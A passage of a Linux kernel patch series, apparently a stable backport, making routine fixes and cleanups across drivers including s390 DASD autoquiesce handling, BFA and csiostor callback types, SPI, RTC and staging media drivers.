+@@ -900,7 +900,7 @@ static int __maybe_unused stm32_rproc_suspend(struct device *dev)
+ 	return 0;
+ }
+ 
+-static int __maybe_unused stm32_rproc_resume(struct device *dev)
++static int stm32_rproc_resume(struct device *dev)
+ {
+ 	struct rproc *rproc = dev_get_drvdata(dev);
+ 	struct stm32_rproc *ddata = rproc->priv;
+@@ -911,16 +911,16 @@ static int __maybe_unused stm32_rproc_resume(struct device *dev)
+ 	return 0;
+ }
+ 
+-static SIMPLE_DEV_PM_OPS(stm32_rproc_pm_ops,
+-			 stm32_rproc_suspend, stm32_rproc_resume);
++static DEFINE_SIMPLE_DEV_PM_OPS(stm32_rproc_pm_ops,
++				stm32_rproc_suspend, stm32_rproc_resume);
+ 
+ static struct platform_driver stm32_rproc_driver = {
+ 	.probe = stm32_rproc_probe,
+ 	.remove = stm32_rproc_remove,
+ 	.driver = {
+ 		.name = "stm32-rproc",
+-		.pm = &stm32_rproc_pm_ops,
+-		.of_match_table = of_match_ptr(stm32_rproc_match),
++		.pm = pm_ptr(&stm32_rproc_pm_ops),
++		.of_match_table = stm32_rproc_match,
+ 	},
+ };
+ module_platform_driver(stm32_rproc_driver);
+diff --git a/drivers/rtc/Kconfig b/drivers/rtc/Kconfig
+index bb63edb507da4..87dc050ca004c 100644
+--- a/drivers/rtc/Kconfig
++++ b/drivers/rtc/Kconfig
+@@ -1843,7 +1843,8 @@ config RTC_DRV_MT2712
+ 
+ config RTC_DRV_MT6397
+ 	tristate "MediaTek PMIC based RTC"
+-	depends on MFD_MT6397 || (COMPILE_TEST && IRQ_DOMAIN)
++	depends on MFD_MT6397 || COMPILE_TEST
++	select IRQ_DOMAIN
+ 	help
+ 	  This selects the MediaTek(R) RTC driver. RTC is part of MediaTek
+ 	  MT6397 PMIC. You should enable MT6397 PMIC MFD before select
+diff --git a/drivers/rtc/lib_test.c b/drivers/rtc/lib_test.c
+index d5caf36c56cdc..225c859d6da55 100644
+--- a/drivers/rtc/lib_test.c
++++ b/drivers/rtc/lib_test.c
+@@ -54,7 +54,7 @@ static void rtc_time64_to_tm_test_date_range(struct kunit *test)
+ 
+ 		days = div_s64(secs, 86400);
+ 
+-		#define FAIL_MSG "%d/%02d/%02d (%2d) : %ld", \
++		#define FAIL_MSG "%d/%02d/%02d (%2d) : %lld", \
+ 			year, month, mday, yday, days
+ 
+ 		KUNIT_ASSERT_EQ_MSG(test, year - 1900, result.tm_year, FAIL_MSG);
+diff --git a/drivers/s390/block/dasd.c b/drivers/s390/block/dasd.c
+index f207de4a87a0f..341d65acd715d 100644
+--- a/drivers/s390/block/dasd.c
++++ b/drivers/s390/block/dasd.c
+@@ -8,9 +8,6 @@
+  * Copyright IBM Corp. 1999, 2009
+  */
+ 
+-#define KMSG_COMPONENT "dasd"
+-#define pr_fmt(fmt) KMSG_COMPONENT ": " fmt
+-
+ #include <linux/kmod.h>
+ #include <linux/init.h>
+ #include <linux/interrupt.h>
+@@ -73,7 +70,8 @@ static void dasd_profile_init(struct dasd_profile *, struct dentry *);
+ static void dasd_profile_exit(struct dasd_profile *);
+ static void dasd_hosts_init(struct dentry *, struct dasd_device *);
+ static void dasd_hosts_exit(struct dasd_device *);
+-
++static int dasd_handle_autoquiesce(struct dasd_device *, struct dasd_ccw_req *,
++				   unsigned int);
+ /*
+  * SECTION: Operations on the device structure.
+  */
+@@ -2327,7 +2325,7 @@ static int _dasd_sleep_on(struct dasd_ccw_req *maincqr, int interruptible)
+ 		/* Non-temporary stop condition will trigger fail fast */
+ 		if (device->stopped & ~DASD_STOPPED_PENDING &&
+ 		    test_bit(DASD_CQR_FLAGS_FAILFAST, &cqr->flags) &&
+-		    (!dasd_eer_enabled(device))) {
++		    !dasd_eer_enabled(device) && device->aq_mask == 0) {
+ 			cqr->status = DASD_CQR_FAILED;
+ 			cqr->intrc = -ENOLINK;
+ 			continue;
+@@ -2803,20 +2801,18 @@ static void __dasd_process_block_ccw_queue(struct dasd_block *block,
+ 			dasd_log_sense(cqr, &cqr->irb);
+ 		}
+ 
+-		/* First of all call extended error reporting. */
+-		if (dasd_eer_enabled(base) &&
+-		    cqr->status == DASD_CQR_FAILED) {
+-			dasd_eer_write(base, cqr, DASD_EER_FATALERROR);
+-
+-			/* restart request  */
++		/*
++		 * First call extended error reporting and check for autoquiesce
++		 */
++		spin_lock_irqsave(get_ccwdev_lock(base->cdev), flags);
++		if (cqr->status == DASD_CQR_FAILED &&
++		    dasd_handle_autoquiesce(base, cqr, DASD_EER_FATALERROR)) {
+ 			cqr->status = DASD_CQR_FILLED;
+ 			cqr->retries = 255;
+-			spin_lock_irqsave(get_ccwdev_lock(base->cdev), flags);
+-			dasd_device_set_stop_bits(base, DASD_STOPPED_QUIESCE);
+-			spin_unlock_irqrestore(get_ccwdev_lock(base->cdev),
+-					       flags);
++			spin_unlock_irqrestore(get_ccwdev_lock(base->cdev), flags);
+ 			goto restart;
+ 		}
++		spin_unlock_irqrestore(get_ccwdev_lock(base->cdev), flags);
+ 
+ 		/* Process finished ERP request. */
+ 		if (cqr->refers) {
+@@ -2858,7 +2854,7 @@ static void __dasd_block_start_head(struct dasd_block *block)
+ 		/* Non-temporary stop condition will trigger fail fast */
+ 		if (block->base->stopped & ~DASD_STOPPED_PENDING &&
+ 		    test_bit(DASD_CQR_FLAGS_FAILFAST, &cqr->flags) &&
+-		    (!dasd_eer_enabled(block->base))) {
++		    !dasd_eer_enabled(block->base) && block->base->aq_mask == 0) {
+ 			cqr->status = DASD_CQR_FAILED;
+ 			cqr->intrc = -ENOLINK;
+ 			dasd_schedule_block_bh(block);
+@@ -3391,8 +3387,7 @@ static void dasd_generic_auto_online(void *data, async_cookie_t cookie)
+ 
+ 	ret = ccw_device_set_online(cdev);
+ 	if (ret)
+-		pr_warn("%s: Setting the DASD online failed with rc=%d\n",
+-			dev_name(&cdev->dev), ret);
++		dev_warn(&cdev->dev, "Setting the DASD online failed with rc=%d\n", ret);
+ }
+ 
+ /*
+@@ -3479,8 +3474,11 @@ int dasd_generic_set_online(struct ccw_device *cdev,
+ {
+ 	struct dasd_discipline *discipline;
+ 	struct dasd_device *device;
++	struct device *dev;
+ 	int rc;
+ 
++	dev = &cdev->dev;
++
+ 	/* first online clears initial online feature flag */
+ 	dasd_set_feature(cdev, DASD_FEATURE_INITIAL_ONLINE, 0);
+ 	device = dasd_create_device(cdev);
+@@ -3493,11 +3491,10 @@ int dasd_generic_set_online(struct ccw_device *cdev,
+ 			/* Try to load the required module. */
+ 			rc = request_module(DASD_DIAG_MOD);
+ 			if (rc) {
+-				pr_warn("%s Setting the DASD online failed "
+-					"because the required module %s "
+-					"could not be loaded (rc=%d)\n",
+-					dev_name(&cdev->dev), DASD_DIAG_MOD,
+-					rc);
++				dev_warn(dev, "Setting the DASD online failed "
++					 "because the required module %s "
++					 "could not be loaded (rc=%d)\n",
++					 DASD_DIAG_MOD, rc);
+ 				dasd_delete_device(device);
+ 				return -ENODEV;
+ 			}
+@@ -3505,8 +3502,7 @@ int dasd_generic_set_online(struct ccw_device *cdev,
+ 		/* Module init could have failed, so check again here after
+ 		 * request_module(). */
+ 		if (!dasd_diag_discipline_pointer) {
+-			pr_warn("%s Setting the DASD online failed because of missing DIAG discipline\n",
+-				dev_name(&cdev->dev));
++			dev_warn(dev, "Setting the DASD online failed because of missing DIAG discipline\n");
+ 			dasd_delete_device(device);
+ 			return -ENODEV;
+ 		}
+@@ -3516,37 +3512,33 @@ int dasd_generic_set_online(struct ccw_device *cdev,
+ 		dasd_delete_device(device);
+ 		return -EINVAL;
+ 	}
++	device->base_discipline = base_discipline;
+ 	if (!try_module_get(discipline->owner)) {
+-		module_put(base_discipline->owner);
+ 		dasd_delete_device(device);
+ 		return -EINVAL;
+ 	}
+-	device->base_discipline = base_discipline;
+ 	device->discipline = discipline;
+ 
+ 	/* check_device will allocate block device if necessary */
+ 	rc = discipline->check_device(device);
+ 	if (rc) {
+-		pr_warn("%s Setting the DASD online with discipline %s failed with rc=%i\n",
+-			dev_name(&cdev->dev), discipline->name, rc);
+-		module_put(discipline->owner);
+-		module_put(base_discipline->owner);
++		dev_warn(dev, "Setting the DASD online with discipline %s failed with rc=%i\n",
++			 discipline->name, rc);
+ 		dasd_delete_device(device);
+ 		return rc;
+ 	}
+ 
+ 	dasd_set_target_state(device, DASD_STATE_ONLINE);
+ 	if (device->state <= DASD_STATE_KNOWN) {
+-		pr_warn("%s Setting the DASD online failed because of a missing discipline\n",
+-			dev_name(&cdev->dev));
++		dev_warn(dev, "Setting the DASD online failed because of a missing discipline\n");
+ 		rc = -ENODEV;
+ 		dasd_set_target_state(device, DASD_STATE_NEW);
+ 		if (device->block)
+ 			dasd_free_block(device->block);
+ 		dasd_delete_device(device);
+-	} else
+-		pr_debug("dasd_generic device %s found\n",
+-				dev_name(&cdev->dev));
++	} else {
++		dev_dbg(dev, "dasd_generic device found\n");
++	}
+ 
+ 	wait_event(dasd_init_waitq, _wait_for_device(device));
+ 
+@@ -3557,10 +3549,13 @@ EXPORT_SYMBOL_GPL(dasd_generic_set_online);
+ 
+ int dasd_generic_set_offline(struct ccw_device *cdev)
+ {
++	int max_count, open_count, rc;
+ 	struct dasd_device *device;
+ 	struct dasd_block *block;
+-	int max_count, open_count, rc;
+ 	unsigned long flags;
++	struct device *dev;
++
++	dev = &cdev->dev;
+ 
+ 	rc = 0;
+ 	spin_lock_irqsave(get_ccwdev_lock(cdev), flags);
+@@ -3581,11 +3576,10 @@ int dasd_generic_set_offline(struct ccw_device *cdev)
+ 		open_count = atomic_read(&device->block->open_count);
+ 		if (open_count > max_count) {
+ 			if (open_count > 0)
+-				pr_warn("%s: The DASD cannot be set offline with open count %i\n",
+-					dev_name(&cdev->dev), open_count);
++				dev_warn(dev, "The DASD cannot be set offline with open count %i\n",
++					 open_count);
+ 			else
+-				pr_warn("%s: The DASD cannot be set offline while it is in use\n",
+-					dev_name(&cdev->dev));
++				dev_warn(dev, "The DASD cannot be set offline while it is in use\n");
+ 			rc = -EBUSY;
+ 			goto out_err;
+ 		}
+@@ -3682,8 +3676,8 @@ int dasd_generic_last_path_gone(struct dasd_device *device)
+ 	dev_warn(&device->cdev->dev, "No operational channel path is left "
+ 		 "for the device\n");
+ 	DBF_DEV_EVENT(DBF_WARNING, device, "%s", "last path gone");
+-	/* First of all call extended error reporting. */
+-	dasd_eer_write(device, NULL, DASD_EER_NOPATH);
++	/* First call extended error reporting and check for autoquiesce. */
++	dasd_handle_autoquiesce(device, NULL, DASD_EER_NOPATH);
+ 
+ 	if (device->state < DASD_STATE_BASIC)
+ 		return 0;
+@@ -3815,7 +3809,8 @@ void dasd_generic_path_event(struct ccw_device *cdev, int *path_event)
+ 			 "No verified channel paths remain for the device\n");
+ 		DBF_DEV_EVENT(DBF_WARNING, device,
+ 			      "%s", "last verified path gone");
+-		dasd_eer_write(device, NULL, DASD_EER_NOPATH);
++		/* First call extended error reporting and check for autoquiesce. */
++		dasd_handle_autoquiesce(device, NULL, DASD_EER_NOPATH);
+ 		dasd_device_set_stop_bits(device,
+ 					  DASD_STOPPED_DC_WAIT);
+ 	}
+@@ -3837,7 +3832,8 @@ EXPORT_SYMBOL_GPL(dasd_generic_verify_path);
+ void dasd_generic_space_exhaust(struct dasd_device *device,
+ 				struct dasd_ccw_req *cqr)
+ {
+-	dasd_eer_write(device, NULL, DASD_EER_NOSPC);
++	/* First call extended error reporting and check for autoquiesce. */
++	dasd_handle_autoquiesce(device, NULL, DASD_EER_NOSPC);
+ 
+ 	if (device->state < DASD_STATE_BASIC)
+ 		return;
+@@ -3931,6 +3927,31 @@ void dasd_schedule_requeue(struct dasd_device *device)
+ }
+ EXPORT_SYMBOL(dasd_schedule_requeue);
+ 
++static int dasd_handle_autoquiesce(struct dasd_device *device,
++				   struct dasd_ccw_req *cqr,
++				   unsigned int reason)
++{
++	/* in any case write eer message with reason */
++	if (dasd_eer_enabled(device))
++		dasd_eer_write(device, cqr, reason);
++
++	if (!test_bit(reason, &device->aq_mask))
++		return 0;
++
++	/* notify eer about autoquiesce */
++	if (dasd_eer_enabled(device))
++		dasd_eer_write(device, NULL, DASD_EER_AUTOQUIESCE);
++
++	dev_info(&device->cdev->dev,
++		 "The DASD has been put in the quiesce state\n");
++	dasd_device_set_stop_bits(device, DASD_STOPPED_QUIESCE);
++
++	if (device->features & DASD_FEATURE_REQUEUEQUIESCE)
++		dasd_schedule_requeue(device);
++
++	return 1;
++}
++
+ static struct dasd_ccw_req *dasd_generic_build_rdc(struct dasd_device *device,
+ 						   int rdc_buffer_size,
+ 						   int magic)
+diff --git a/drivers/s390/block/dasd_eer.c b/drivers/s390/block/dasd_eer.c
+index d4d31cd11d261..d16c699b9ac6d 100644
+--- a/drivers/s390/block/dasd_eer.c
++++ b/drivers/s390/block/dasd_eer.c
+@@ -387,6 +387,7 @@ void dasd_eer_write(struct dasd_device *device, struct dasd_ccw_req *cqr,
+ 		break;
+ 	case DASD_EER_NOPATH:
+ 	case DASD_EER_NOSPC:
++	case DASD_EER_AUTOQUIESCE:
+ 		dasd_eer_write_standard_trigger(device, NULL, id);
+ 		break;
+ 	case DASD_EER_STATECHANGE:
+diff --git a/drivers/s390/block/dasd_int.h b/drivers/s390/block/dasd_int.h
+index f50932518f83a..00bcd177264ac 100644
+--- a/drivers/s390/block/dasd_int.h
++++ b/drivers/s390/block/dasd_int.h
+@@ -464,6 +464,7 @@ extern struct dasd_discipline *dasd_diag_discipline_pointer;
+ #define DASD_EER_STATECHANGE 3
+ #define DASD_EER_PPRCSUSPEND 4
+ #define DASD_EER_NOSPC	     5
++#define DASD_EER_AUTOQUIESCE 31
+ 
+ /* DASD path handling */
+ 
+@@ -641,6 +642,7 @@ struct dasd_device {
+ 	struct dasd_format_entry format_entry;
+ 	struct kset *paths_info;
+ 	struct dasd_copy_relation *copy;
++	unsigned long aq_mask;
+ };
+ 
+ struct dasd_block {
+diff --git a/drivers/scsi/bfa/bfa.h b/drivers/scsi/bfa/bfa.h
+index 7bd2ba1ad4d11..f30fe324e6ecc 100644
+--- a/drivers/scsi/bfa/bfa.h
++++ b/drivers/scsi/bfa/bfa.h
+@@ -20,7 +20,6 @@
+ struct bfa_s;
+ 
+ typedef void (*bfa_isr_func_t) (struct bfa_s *bfa, struct bfi_msg_s *m);
+-typedef void (*bfa_cb_cbfn_status_t) (void *cbarg, bfa_status_t status);
+ 
+ /*
+  * Interrupt message handlers
+@@ -437,4 +436,12 @@ struct bfa_cb_pending_q_s {
+ 	(__qe)->data = (__data);				\
+ } while (0)
+ 
++#define bfa_pending_q_init_status(__qe, __cbfn, __cbarg, __data) do {	\
++	bfa_q_qe_init(&((__qe)->hcb_qe.qe));			\
++	(__qe)->hcb_qe.cbfn_status = (__cbfn);			\
++	(__qe)->hcb_qe.cbarg = (__cbarg);			\
++	(__qe)->hcb_qe.pre_rmv = BFA_TRUE;			\
++	(__qe)->data = (__data);				\
++} while (0)
++
+ #endif /* __BFA_H__ */
+diff --git a/drivers/scsi/bfa/bfa_core.c b/drivers/scsi/bfa/bfa_core.c
+index 6846ca8f7313c..3438d0b8ba062 100644
+--- a/drivers/scsi/bfa/bfa_core.c
++++ b/drivers/scsi/bfa/bfa_core.c
+@@ -1907,15 +1907,13 @@ bfa_comp_process(struct bfa_s *bfa, struct list_head *comp_q)
+ 	struct list_head		*qe;
+ 	struct list_head		*qen;
+ 	struct bfa_cb_qe_s	*hcb_qe;
+-	bfa_cb_cbfn_status_t	cbfn;
+ 
+ 	list_for_each_safe(qe, qen, comp_q) {
+ 		hcb_qe = (struct bfa_cb_qe_s *) qe;
+ 		if (hcb_qe->pre_rmv) {
+ 			/* qe is invalid after return, dequeue before cbfn() */
+ 			list_del(qe);
+-			cbfn = (bfa_cb_cbfn_status_t)(hcb_qe->cbfn);
+-			cbfn(hcb_qe->cbarg, hcb_qe->fw_status);
++			hcb_qe->cbfn_status(hcb_qe->cbarg, hcb_qe->fw_status);
+ 		} else
+ 			hcb_qe->cbfn(hcb_qe->cbarg, BFA_TRUE);
+ 	}
+diff --git a/drivers/scsi/bfa/bfa_ioc.h b/drivers/scsi/bfa/bfa_ioc.h
+index 933a1c3890ff5..5e568d6d7b261 100644
+--- a/drivers/scsi/bfa/bfa_ioc.h
++++ b/drivers/scsi/bfa/bfa_ioc.h
+@@ -361,14 +361,18 @@ struct bfa_reqq_wait_s {
+ 	void	*cbarg;
+ };
+ 
+-typedef void	(*bfa_cb_cbfn_t) (void *cbarg, bfa_boolean_t complete);
++typedef void (*bfa_cb_cbfn_t) (void *cbarg, bfa_boolean_t complete);
++typedef void (*bfa_cb_cbfn_status_t) (void *cbarg, bfa_status_t status);
+ 
+ /*
+  * Generic BFA callback element.
+  */
+ struct bfa_cb_qe_s {
+ 	struct list_head	qe;
+-	bfa_cb_cbfn_t	cbfn;
++	union {
++		bfa_cb_cbfn_status_t	cbfn_status;
++		bfa_cb_cbfn_t		cbfn;
++	};
+ 	bfa_boolean_t	once;
+ 	bfa_boolean_t	pre_rmv;	/* set for stack based qe(s) */
+ 	bfa_status_t	fw_status;	/* to access fw status in comp proc */
+diff --git a/drivers/scsi/bfa/bfad_bsg.c b/drivers/scsi/bfa/bfad_bsg.c
+index be8dfbe13e904..524e4e6979c9f 100644
+--- a/drivers/scsi/bfa/bfad_bsg.c
++++ b/drivers/scsi/bfa/bfad_bsg.c
+@@ -2135,8 +2135,7 @@ bfad_iocmd_fcport_get_stats(struct bfad_s *bfad, void *cmd)
+ 	struct bfa_cb_pending_q_s cb_qe;
+ 
+ 	init_completion(&fcomp.comp);
+-	bfa_pending_q_init(&cb_qe, (bfa_cb_cbfn_t)bfad_hcb_comp,
+-			   &fcomp, &iocmd->stats);
++	bfa_pending_q_init_status(&cb_qe, bfad_hcb_comp, &fcomp, &iocmd->stats);
+ 	spin_lock_irqsave(&bfad->bfad_lock, flags);
+ 	iocmd->status = bfa_fcport_get_stats(&bfad->bfa, &cb_qe);
+ 	spin_unlock_irqrestore(&bfad->bfad_lock, flags);
+@@ -2159,7 +2158,7 @@ bfad_iocmd_fcport_reset_stats(struct bfad_s *bfad, void *cmd)
+ 	struct bfa_cb_pending_q_s cb_qe;
+ 
+ 	init_completion(&fcomp.comp);
+-	bfa_pending_q_init(&cb_qe, (bfa_cb_cbfn_t)bfad_hcb_comp, &fcomp, NULL);
++	bfa_pending_q_init_status(&cb_qe, bfad_hcb_comp, &fcomp, NULL);
+ 
+ 	spin_lock_irqsave(&bfad->bfad_lock, flags);
+ 	iocmd->status = bfa_fcport_clear_stats(&bfad->bfa, &cb_qe);
+@@ -2443,8 +2442,7 @@ bfad_iocmd_qos_get_stats(struct bfad_s *bfad, void *cmd)
+ 	struct bfa_fcport_s *fcport = BFA_FCPORT_MOD(&bfad->bfa);
+ 
+ 	init_completion(&fcomp.comp);
+-	bfa_pending_q_init(&cb_qe, (bfa_cb_cbfn_t)bfad_hcb_comp,
+-			   &fcomp, &iocmd->stats);
++	bfa_pending_q_init_status(&cb_qe, bfad_hcb_comp, &fcomp, &iocmd->stats);
+ 
+ 	spin_lock_irqsave(&bfad->bfad_lock, flags);
+ 	WARN_ON(!bfa_ioc_get_fcmode(&bfad->bfa.ioc));
+@@ -2474,8 +2472,7 @@ bfad_iocmd_qos_reset_stats(struct bfad_s *bfad, void *cmd)
+ 	struct bfa_fcport_s *fcport = BFA_FCPORT_MOD(&bfad->bfa);
+ 
+ 	init_completion(&fcomp.comp);
+-	bfa_pending_q_init(&cb_qe, (bfa_cb_cbfn_t)bfad_hcb_comp,
+-			   &fcomp, NULL);
++	bfa_pending_q_init_status(&cb_qe, bfad_hcb_comp, &fcomp, NULL);
+ 
+ 	spin_lock_irqsave(&bfad->bfad_lock, flags);
+ 	WARN_ON(!bfa_ioc_get_fcmode(&bfad->bfa.ioc));
+diff --git a/drivers/scsi/csiostor/csio_defs.h b/drivers/scsi/csiostor/csio_defs.h
+index c38017b4af982..e50e93e7fe5a1 100644
+--- a/drivers/scsi/csiostor/csio_defs.h
++++ b/drivers/scsi/csiostor/csio_defs.h
+@@ -73,7 +73,21 @@ csio_list_deleted(struct list_head *list)
+ #define csio_list_prev(elem)	(((struct list_head *)(elem))->prev)
+ 
+ /* State machine */
+-typedef void (*csio_sm_state_t)(void *, uint32_t);
++struct csio_lnode;
++
++/* State machine evets */
++enum csio_ln_ev {
++	CSIO_LNE_NONE = (uint32_t)0,
++	CSIO_LNE_LINKUP,
++	CSIO_LNE_FAB_INIT_DONE,
++	CSIO_LNE_LINK_DOWN,
++	CSIO_LNE_DOWN_LINK,
++	CSIO_LNE_LOGO,
++	CSIO_LNE_CLOSE,
++	CSIO_LNE_MAX_EVENT,
++};
++
++typedef void (*csio_sm_state_t)(struct csio_lnode *ln, enum csio_ln_ev evt);
+ 
+ struct csio_sm {
+ 	struct list_head	sm_list;
+@@ -83,7 +97,7 @@ struct csio_sm {
+ static inline void
+ csio_set_state(void *smp, void *state)
+ {
+-	((struct csio_sm *)smp)->sm_state = (csio_sm_state_t)state;
++	((struct csio_sm *)smp)->sm_state = state;
+ }
+ 
+ static inline void
+diff --git a/drivers/scsi/csiostor/csio_lnode.c b/drivers/scsi/csiostor/csio_lnode.c
+index d5ac938970232..5b3ffefae476d 100644
+--- a/drivers/scsi/csiostor/csio_lnode.c
++++ b/drivers/scsi/csiostor/csio_lnode.c
+@@ -1095,7 +1095,7 @@ csio_handle_link_down(struct csio_hw *hw, uint8_t portid, uint32_t fcfi,
+ int
+ csio_is_lnode_ready(struct csio_lnode *ln)
+ {
+-	return (csio_get_state(ln) == ((csio_sm_state_t)csio_lns_ready));
++	return (csio_get_state(ln) == csio_lns_ready);
+ }
+ 
+ /*****************************************************************************/
+@@ -1366,15 +1366,15 @@ csio_free_fcfinfo(struct kref *kref)
+ void
+ csio_lnode_state_to_str(struct csio_lnode *ln, int8_t *str)
+ {
+-	if (csio_get_state(ln) == ((csio_sm_state_t)csio_lns_uninit)) {
++	if (csio_get_state(ln) == csio_lns_uninit) {
+ 		strcpy(str, "UNINIT");
+ 		return;
+ 	}
+-	if (csio_get_state(ln) == ((csio_sm_state_t)csio_lns_ready)) {
++	if (csio_get_state(ln) == csio_lns_ready) {
+ 		strcpy(str, "READY");
+ 		return;
+ 	}
+-	if (csio_get_state(ln) == ((csio_sm_state_t)csio_lns_offline)) {
++	if (csio_get_state(ln) == csio_lns_offline) {
+ 		strcpy(str, "OFFLINE");
+ 		return;
+ 	}
+diff --git a/drivers/scsi/csiostor/csio_lnode.h b/drivers/scsi/csiostor/csio_lnode.h
+index 372a67d122d38..607698a0f0631 100644
+--- a/drivers/scsi/csiostor/csio_lnode.h
++++ b/drivers/scsi/csiostor/csio_lnode.h
+@@ -53,19 +53,6 @@
+ extern int csio_fcoe_rnodes;
+ extern int csio_fdmi_enable;
+ 
+-/* State machine evets */
+-enum csio_ln_ev {
+-	CSIO_LNE_NONE = (uint32_t)0,
+-	CSIO_LNE_LINKUP,
+-	CSIO_LNE_FAB_INIT_DONE,
+-	CSIO_LNE_LINK_DOWN,
+-	CSIO_LNE_DOWN_LINK,
+-	CSIO_LNE_LOGO,
+-	CSIO_LNE_CLOSE,
+-	CSIO_LNE_MAX_EVENT,
+-};
+-
+-
+ struct csio_fcf_info {
+ 	struct list_head	list;
+ 	uint8_t			priority;
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.c b/drivers/scsi/mpt3sas/mpt3sas_base.c
+index 809be43f440dc..8e6ac08e553bb 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.c
+@@ -7398,7 +7398,9 @@ _base_wait_for_iocstate(struct MPT3SAS_ADAPTER *ioc, int timeout)
+ 		return -EFAULT;
+ 	}
+ 
+- issue_diag_reset:
++	return 0;
++
++issue_diag_reset:
+ 	rc = _base_diag_reset(ioc);
+ 	return rc;
+ }
+diff --git a/drivers/soc/fsl/dpio/dpio-service.c b/drivers/soc/fsl/dpio/dpio-service.c
+index 1d2b27e3ea63f..b811446e0fa55 100644
+--- a/drivers/soc/fsl/dpio/dpio-service.c
++++ b/drivers/soc/fsl/dpio/dpio-service.c
+@@ -523,7 +523,7 @@ int dpaa2_io_service_enqueue_multiple_desc_fq(struct dpaa2_io *d,
+ 	struct qbman_eq_desc *ed;
+ 	int i, ret;
+ 
+-	ed = kcalloc(sizeof(struct qbman_eq_desc), 32, GFP_KERNEL);
++	ed = kcalloc(32, sizeof(struct qbman_eq_desc), GFP_KERNEL);
+ 	if (!ed)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/soc/microchip/Kconfig b/drivers/soc/microchip/Kconfig
+index eb656b33156ba..f19e74d342aa2 100644
+--- a/drivers/soc/microchip/Kconfig
++++ b/drivers/soc/microchip/Kconfig
+@@ -1,5 +1,5 @@
+ config POLARFIRE_SOC_SYS_CTRL
+-	tristate "POLARFIRE_SOC_SYS_CTRL"
++	tristate "Microchip PolarFire SoC (MPFS) system controller support"
+ 	depends on POLARFIRE_SOC_MAILBOX
+ 	help
+ 	  This driver adds support for the PolarFire SoC (MPFS) system controller.
+diff --git a/drivers/soc/qcom/rpmhpd.c b/drivers/soc/qcom/rpmhpd.c
+index 9a90f241bb97f..6efe36aeb48e9 100644
+--- a/drivers/soc/qcom/rpmhpd.c
++++ b/drivers/soc/qcom/rpmhpd.c
+@@ -195,7 +195,6 @@ static struct rpmhpd *sa8540p_rpmhpds[] = {
+ 	[SC8280XP_CX] = &cx,
+ 	[SC8280XP_CX_AO] = &cx_ao,
+ 	[SC8280XP_EBI] = &ebi,
+-	[SC8280XP_GFX] = &gfx,
+ 	[SC8280XP_LCX] = &lcx,
+ 	[SC8280XP_LMX] = &lmx,
+ 	[SC8280XP_MMCX] = &mmcx,
+diff --git a/drivers/spi/spi-mt65xx.c b/drivers/spi/spi-mt65xx.c
+index 6e95efb50acbc..f9ec8742917a6 100644
+--- a/drivers/spi/spi-mt65xx.c
++++ b/drivers/spi/spi-mt65xx.c
+@@ -787,17 +787,19 @@ static irqreturn_t mtk_spi_interrupt(int irq, void *dev_id)
+ 		mdata->xfer_len = min(MTK_SPI_MAX_FIFO_SIZE, len);
+ 		mtk_spi_setup_packet(master);
+ 
+-		cnt = mdata->xfer_len / 4;
+-		iowrite32_rep(mdata->base + SPI_TX_DATA_REG,
+-				trans->tx_buf + mdata->num_xfered, cnt);
++		if (trans->tx_buf) {
++			cnt = mdata->xfer_len / 4;
++			iowrite32_rep(mdata->base + SPI_TX_DATA_REG,
++					trans->tx_buf + mdata->num_xfered, cnt);
+ 
+-		remainder = mdata->xfer_len % 4;
+-		if (remainder > 0) {
+-			reg_val = 0;
+-			memcpy(&reg_val,
+-				trans->tx_buf + (cnt * 4) + mdata->num_xfered,
+-				remainder);
+-			writel(reg_val, mdata->base + SPI_TX_DATA_REG);
++			remainder = mdata->xfer_len % 4;
++			if (remainder > 0) {
++				reg_val = 0;
++				memcpy(&reg_val,
++					trans->tx_buf + (cnt * 4) + mdata->num_xfered,
++					remainder);
++				writel(reg_val, mdata->base + SPI_TX_DATA_REG);
++			}
+ 		}
+ 
+ 		mtk_spi_enable_transfer(master);
+diff --git a/drivers/staging/greybus/light.c b/drivers/staging/greybus/light.c
+index 87d36948c6106..c6bd86a5335ab 100644
+--- a/drivers/staging/greybus/light.c
++++ b/drivers/staging/greybus/light.c
+@@ -100,15 +100,15 @@ static struct led_classdev *get_channel_cdev(struct gb_channel *channel)
+ static struct gb_channel *get_channel_from_mode(struct gb_light *light,
+ 						u32 mode)
+ {
+-	struct gb_channel *channel = NULL;
++	struct gb_channel *channel;
+ 	int i;
+ 
+ 	for (i = 0; i < light->channels_count; i++) {
+ 		channel = &light->channels[i];
+-		if (channel && channel->mode == mode)
+-			break;
++		if (channel->mode == mode)
++			return channel;
+ 	}
+-	return channel;
++	return NULL;
+ }
+ 
+ static int __gb_lights_flash_intensity_set(struct gb_channel *channel,
+diff --git a/drivers/staging/media/deprecated/saa7146/ttpci/budget-av.c b/drivers/staging/media/deprecated/saa7146/ttpci/budget-av.c
+index 0c61a2dec2211..81fc4835679f3 100644
+--- a/drivers/staging/media/deprecated/saa7146/ttpci/budget-av.c
++++ b/drivers/staging/media/deprecated/saa7146/ttpci/budget-av.c
+@@ -1462,7 +1462,8 @@ static int budget_av_attach(struct saa7146_dev *dev, struct saa7146_pci_extensio
+ 		budget_av->has_saa7113 = 1;
+ 		err = saa7146_vv_init(dev, &vv_data);
+ 		if (err != 0) {
+-			/* fixme: proper cleanup here */
++			ttpci_budget_deinit(&budget_av->budget);
++			kfree(budget_av);
+ 			ERR("cannot init vv subsystem\n");
+ 			return err;
+ 		}
+@@ -1471,9 +1472,10 @@ static int budget_av_attach(struct saa7146_dev *dev, struct saa7146_pci_extensio
+ 		vv_data.vid_ops.vidioc_s_input = vidioc_s_input;
+ 
+ 		if ((err = saa7146_register_device(&budget_av->vd, dev, "knc1", VFL_TYPE_VIDEO))) {
+-			/* fixme: proper cleanup here */
+-			ERR("cannot register capture v4l2 device\n");
+ 			saa7146_vv_release(dev);
++			ttpci_budget_deinit(&budget_av->budget);
++			kfree(budget_av);
++			ERR("cannot register capture v4l2 device\n");
+ 			return err;
+ 		}
+ 
+diff --git a/drivers/staging/media/imx/imx-media-csc-scaler.c b/drivers/staging/media/imx/imx-media-csc-scaler.c
+index 1fd39a2fca98a..95cca281e8a37 100644
+--- a/drivers/staging/media/imx/imx-media-csc-scaler.c
++++ b/drivers/staging/media/imx/imx-media-csc-scaler.c
+@@ -803,6 +803,7 @@ static int ipu_csc_scaler_release(struct file *file)
+ 
+ 	dev_dbg(priv->dev, "Releasing instance %p\n", ctx);
+ 
